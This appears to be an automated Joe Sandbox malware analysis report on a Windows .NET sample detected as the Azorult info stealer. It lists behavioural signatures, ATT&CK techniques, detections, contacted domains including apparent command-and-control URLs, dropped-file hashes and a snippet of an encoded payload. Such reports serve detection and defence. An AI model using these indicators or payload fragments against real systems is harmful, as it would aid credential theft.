                Source: hfLfKDTosA.exe, 00000002.00000002.378765813.00000000062F0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                Source: hfLfKDTosA.exe, 00000002.00000002.373381863.00000000011BB000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW4L Gigabit Network Connection
                Source: hfLfKDTosA.exe, 00000002.00000002.378765813.00000000062F0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe Code function: 6_2_00418124 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WSAStartup,socket,gethostbyname,htons,connect,send,closesocket
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe Code function: 6_2_00407A34 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe Process token adjusted: Debug
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe Memory allocated: page read and write | page guard
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe Process created: C:\Users\user\Desktop\hfLfKDTosA.exe C:\Users\user\Desktop\hfLfKDTosA.exe
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe Code function: GetLocaleInfoA, 6_2_00404B4C
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe Queries volume information: C:\Users\user\Desktop\hfLfKDTosA.exe VolumeInformation
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe Code function: 6_2_004065CC GetUserNameW
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe Code function: 6_2_00404C15 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId
                Source: C:\Users\user\Desktop\hfLfKDTosA.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information:

                Yara detected Azorult
                Source: Yara match File source: 00000002.00000002.375321836.000000000415E000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: hfLfKDTosA.exe PID: 7100, type: MEMORY
                Source: Yara match File source: Process Memory Space: hfLfKDTosA.exe PID: 6420, type: MEMORY
                Source: Yara match File source: 6.2.hfLfKDTosA.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 6.2.hfLfKDTosA.exe.400000.0.unpack, type: UNPACKEDPE
                Yara detected Azorult Info Stealer
                Source: Yara match File source: 00000002.00000002.375321836.000000000415E000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match File source: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: hfLfKDTosA.exe PID: 7100, type: MEMORY
                Source: Yara match File source: Process Memory Space: hfLfKDTosA.exe PID: 6420, type: MEMORY
                Source: Yara match File source: 6.2.hfLfKDTosA.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 6.2.hfLfKDTosA.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match File source: Process Memory Space: hfLfKDTosA.exe PID: 7100, type: MEMORY
                Source: Yara match File source: Process Memory Space: hfLfKDTosA.exe PID: 6420, type: MEMORY

                Mitre Att&ck Matrix

                Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                Valid Accounts | Native API 1 | Application Shimming 1 | Process Injection 11 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 22 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Application Shimming 1 | Virtualization/Sandbox Evasion 2 | LSASS Memory | Virtualization/Sandbox Evasion 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 1 | Security Account Manager | Process Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 11 | NTDS | Account Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 23 | SIM Card Swap | | Carrier Billing Fraud
                Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | System Owner/User Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 2 | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                External Remote Services | Scheduled Task | Startup Items | Startup Items | Timestomp 1 | DCSync | File and Directory Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery 24 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                Source | Detection | Scanner | Label
                hfLfKDTosA.exe | 23% | Virustotal |
                hfLfKDTosA.exe | 21% | ReversingLabs | ByteCode-MSIL.Infostealer.Azorult

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                Source | Detection | Scanner | Label
                6.2.hfLfKDTosA.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1108750

                Domains

                Source | Detection | Scanner | Label
                0k10dk21kkeok2e.online | 5% | Virustotal |
                chelseafc.map.fastly.net | 0% | Virustotal |

                URLs


                Domains and IPs

                Contacted Domains

                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                0k10dk21kkeok2e.online | 104.21.59.148 | true | false | | unknown
                chelseafc.map.fastly.net | 151.101.2.133 | true | false | | unknown
                d2hhwit6pbhmvu.cloudfront.net | 99.86.159.103 | true | false | | high
                www.realmadrid.com | unknown | unknown | false | | high
                www.manutd.com | unknown | unknown | false | | high
                busch.duckdns.org | unknown | unknown | true | | unknown
                www.liverpoolfc.com | unknown | unknown | false | | high
                www.mancity.com | unknown | unknown | false | | high
                www.chelseafc.com | unknown | unknown | false | | high

                Contacted URLs

                Name | Malicious | Antivirus Detection | Reputation
                http://0k10dk21kkeok2e.online/base/2930AD689ACFCD5F8337A7469C74A7E8.html | false | Avira URL Cloud: safe | unknown
                http://www.liverpoolfc.com/ | false | | high

                URLs from Memory and Binaries

                                                                                                                            http://crl.rootg2.amazontrust.com/rootg2.crl0hfLfKDTosA.exe, 00000002.00000002.378556474.0000000005F3A000.00000004.00000001.sdmpfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/09/thumb_108617_partnerlogo_hfLfKDTosA.exe, 00000002.00000002.374102351.0000000002FEC000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/page_banner/0002/11/f9d2bf533c57965e0174bf510hfLfKDTosA.exe, 00000002.00000002.374102351.0000000002FEC000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                https://www.tiktok.com/hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                unknown
                                                                                                                                http://www.realmadrid.com/base/SPEqtpfdsaeFqgTZQsvyOXtjwhRSmtsPkVJcLGxKDbMLBpaXNarFtbHlhWinkfNKnAglkhfLfKDTosA.exe, 00000002.00000002.373950117.0000000002F31000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://www.mancity.com4hfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  http://o.ss2.us/0hfLfKDTosA.exe, 00000002.00000002.378556474.0000000005F3A000.00000004.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.liverpoolfc.chfLfKDTosA.exe, 00000002.00000002.374102351.0000000002FEC000.00000004.00000001.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.liverpoolfc.com/accessible/accessiblehfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://schema.org/OrganizationhfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/08/thumb_107008_partnerlogo_hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://www.mancity.comhfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://www.nike.com/gb/hfLfKDTosA.exe, 00000002.00000002.374102351.0000000002FEC000.00000004.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://195.245.112.115/index.phphfLfKDTosA.exe, 00000006.00000003.371615135.00000000029B0000.00000004.00000001.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://www.liverpoolfc.com/membershiphfLfKDTosA.exe, 00000002.00000002.374004984.0000000002F7A000.00000004.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://www.hcltech.com/unitedbyhclhfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://0k10dk21kkeok2e.onlinehfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://www.verbier.ch/en/index.htm?reset=1hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://www.liverpoolfc.com/legal/cookieshfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmp, hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://d3j2s6hdd6a7rg.cloudfront.net/v2/JE-552/lfc/js/scripts.min.jshfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/13/thumb_112272_partnerlogo_hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://www.manutd.com/en/Help/AccessibilityhfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.tourism-mauritius.muhfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.youtube.com/manutdhfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://www.liverpoolfc.com/corporate/rss-feedshfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://d3j2s6hdd6a7rg.cloudfront.net/v2/uploads/media/partnerlogo/0002/18/thumb_117132_partnerlogo_hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://crt.rootg2.amazontrust.com/rootg2.cer0=hfLfKDTosA.exe, 00000002.00000002.378556474.0000000005F3A000.00000004.00000001.sdmpfalse
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  http://ip-api.com/jsonhfLfKDTosA.exefalse
                                                                                                                                                                    high
                                                                                                                                                                    https://d3j2s6hdd6a7rg.cloudfront.net/v2/JE-552/lfc/js/home-scripts.min.jshfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://www.liverpoolfc.com/corporate/anti-slaveryhfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://www.realmadrid.com/frhfLfKDTosA.exe, 00000002.00000002.374102351.0000000002FEC000.00000004.00000001.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://instagram.com/manchesterunitedhfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://sdk.privacy-center.org/loader.jshfLfKDTosA.exe, 00000002.00000002.374102351.0000000002FEC000.00000004.00000001.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            http://busch.duckdns.org/index.phpKhfLfKDTosA.exe, 00000006.00000002.372044773.0000000000EF4000.00000004.00000020.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            https://www.manutd.com/en/Help/Privacy-PolicyhfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://www.manutd.com/en/partners/global/marriott-hotelshfLfKDTosA.exe, 00000002.00000002.374044889.0000000002F94000.00000004.00000001.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://busch.duckdns.org/index.phpghfLfKDTosA.exe, 00000006.00000002.372044773.0000000000EF4000.00000004.00000020.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                https://pubads.g.doubleclick.net/gampad/ads?sz=640x480&iu=/hfLfKDTosA.exe, 00000002.00000002.374102351.0000000002FEC000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://uk.joiebaby.com/liverpoolfc/hfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://www.liverpoolfc.com/corporate/browser-supporthfLfKDTosA.exe, 00000002.00000002.375082678.000000000400E000.00000004.00000001.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://www.realmadrid.com/enhfLfKDTosA.exe, 00000002.00000002.374102351.0000000002FEC000.00000004.00000001.sdmpfalse
                                                                                                                                                                                        high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
151.101.2.133 | unknown | United States | 54113 | FASTLYUS | false
99.86.159.29 | unknown | United States | 16509 | AMAZON-02US | false
104.21.59.148 | unknown | United States | 13335 | CLOUDFLARENETUS | false
99.86.159.103 | unknown | United States | 16509 | AMAZON-02US | false

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 361337
Start date: 02.03.2021
Start time: 20:40:07
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 24s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: hfLfKDTosA.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 7
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal92.troj.spyw.winEXE@5/4@23/4
EGA Information: Failed
HDC Information:
  • Successful, ratio: 34.4% (good quality ratio 33.8%)
  • Quality average: 80.6%
  • Quality standard deviation: 27.2%
HCA Information:
  • Successful, ratio: 99%
                                                                                                                                                                                        • Number of executed functions: 38
                                                                                                                                                                                        • Number of non-executed functions: 52
                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                        • Adjust boot time
                                                                                                                                                                                        • Enable AMSI
                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                        • Stop behavior analysis, all processes terminated
                                                                                                                                                                                        Warnings:
                                                                                                                                                                                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 104.43.139.144, 184.30.21.144, 104.43.193.48, 40.88.32.150, 67.26.83.254, 67.27.235.126, 67.27.233.254, 8.241.121.126, 8.241.122.126, 104.42.151.234, 23.201.251.203, 104.22.7.79, 104.22.6.79, 172.67.24.199, 52.147.198.201, 95.101.45.174, 20.82.210.154
                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): e13832.b.akamaiedge.net, www.mancity.com.cdn.cloudflare.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, realmadrid.edgekey.net, arc.msn.com, skypedataprdcolcus15.cloudapp.net, e14202.g.akamaiedge.net, skypedataprdcoleus16.cloudapp.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, store-images.s-microsoft.com, www.manutd.com.edgekey.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus16.cloudapp.net
                                                                                                                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                        Simulations

                                                                                                                                                                                        Behavior and APIs

Time  Type  Description
20:41:00  API Interceptor  2x Sleep call for process: hfLfKDTosA.exe modified

                                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                                        IPs

Match  Associated Sample Name / URL  SHA 256  Detection  Link  Context

                                                                                                                                                                                        Domains

Match  Associated Sample Name / URL  SHA 256  Detection  Link  Context

                                                                                                                                                                                        ASN


                                                                                                                                                                                        JA3 Fingerprints


                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                        No context

                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                                                        Process:C:\Users\user\Desktop\hfLfKDTosA.exe
                                                                                                                                                                                        File Type:Microsoft Cabinet archive data, 55578 bytes, 1 file
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):55578
                                                                                                                                                                                        Entropy (8bit):7.995342925763736
                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                        SSDEEP:1536:BeQysAgNjwGLn31DsKaOvP3TQ5IhHnQl1GH:84jwGb1IKaOXjVFnQl1GH
                                                                                                                                                                                        MD5:5C76CB48C81E1E013E0FD70132B0B861
                                                                                                                                                                                        SHA1:14ADD82B9C667EAF75E1EB4D02E0AF7EDD166DD5
                                                                                                                                                                                        SHA-256:68158977F401D13973F19AC7C2CF21F74FF60BF1405BF8627C88B51C9B8A6BE5
                                                                                                                                                                                        SHA-512:EAA90CAD25827CC83852A756C1806BE2E5AA05DCADA28ED6B2ED3690DE42F5398B251537AA973DD28563F60828E8A0E114AEB81E09E1644D5D9F0511DF7E37BE
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                                                        Process:C:\Users\user\Desktop\hfLfKDTosA.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                        Entropy (8bit):3.1356171626455667
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:6:kKeQ7K+N+SkQlPlEGYRMY9z+4KlDA3RUeAODX:GZNkPlE99SNxAhUeAOL
                                                                                                                                                                                        MD5:1CE8E2064CCECF73603E957E2D5A21D9
                                                                                                                                                                                        SHA1:B13C2E4A3081D893738A3266FC872FE376456FE9
                                                                                                                                                                                        SHA-256:4F00C36FE44C848621205580BCDA9CBE0273CD58DFFEAFF36FD2063531E2E370
                                                                                                                                                                                        SHA-512:0D0481343A47A17C06964B78F81EE9919B20F48BC166072502744DDFF5AA70915B9BB25C6BC3CA122742DC1BD5B28CE3BC41FEA7174173770BCFA5E800E9C18C
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Preview: p...... ........]|.h....(....................................................... ..........a!.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".8.0.d.3.1.9.6.1.2.1.a.d.7.1.:.0."...
                                                                                                                                                                                        C:\Users\user\AppData\Local\BbgzvTZwbLOGmSg\hfLfKDTosA.exe_Url_zkbupmfckv2c5l1z5bbrnrqte4lojtws\7.451.162.647\wcwt5l1o.newcfg
                                                                                                                                                                                        Process:C:\Users\user\Desktop\hfLfKDTosA.exe
                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):517931
                                                                                                                                                                                        Entropy (8bit):3.1172399258989674
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:12288:cVhyVDR9/Zc5WuBN/LPa3jwxqKD2hZZDqP62MbV7+s:OyVDR9G5WuBN/OzwxqKD2hZV22R
                                                                                                                                                                                        MD5:134054A9F8E705DAC9C68830504A1A2D
                                                                                                                                                                                        SHA1:72A54DCD5563A581428F00E2BEB997DD41232736
                                                                                                                                                                                        SHA-256:1B8BDC3D6F63FCDC3BF29686E542F44770E693729F1944420EB23FE0BC5A5D1A
                                                                                                                                                                                        SHA-512:6E3DD33D798B53EB16D4B6546D41E4B6933A5D11628360F29E857B2B510BAAB6D05F1F6D180208AB12AD59791BA3AE68BD052651BD884BFE2BAAF26E781CC6B4
                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >.. <section name="BbgzvTZwbLOGmSg.HuqumYvFBayIysJLnyZNWODzrJrJpiyaKgF" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />.. </sectionGroup>.. </configSections>.. <userSettings>.. <BbgzvTZwbLOGmSg.HuqumYvFBayIysJLnyZNWODzrJrJpiyaKgF>.. <setting name="LaGMvNoFtuYLSNSlRH" serializeAs="String">.. <value>77g90g144g0g3g0g0g0g4g0g0g0g255g255g0g0g184g0g0g0g0g0g0g0g64g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g0g128g0g0g0g14g31g186g14g0g180g9g205g33g184g1g76g205g33g84g104g105g115g32g112g114g111g103g114g97g109g32g99g97g110g110g111g116g3
                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hfLfKDTosA.exe.log
                                                                                                                                                                                        Process:C:\Users\user\Desktop\hfLfKDTosA.exe
                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                        Category:modified
                                                                                                                                                                                        Size (bytes):1216
                                                                                                                                                                                        Entropy (8bit):5.355304211458859
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                                                                                                                                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                                                                                                                                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                                                                                                                                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                                                                                                                                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                                                                                                                                                                        Static File Info

                                                                                                                                                                                        General

                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                        Entropy (8bit):6.044090080380251
                                                                                                                                                                                        TrID:
                                                                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                                                                                                                        • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                        File name:hfLfKDTosA.exe
                                                                                                                                                                                        File size:17616
                                                                                                                                                                                        MD5:cf351c60783008409a564b31a5c38dd6
                                                                                                                                                                                        SHA1:96f9fbed2b2c5ba5bc542223d6d8ca05fcb377ad
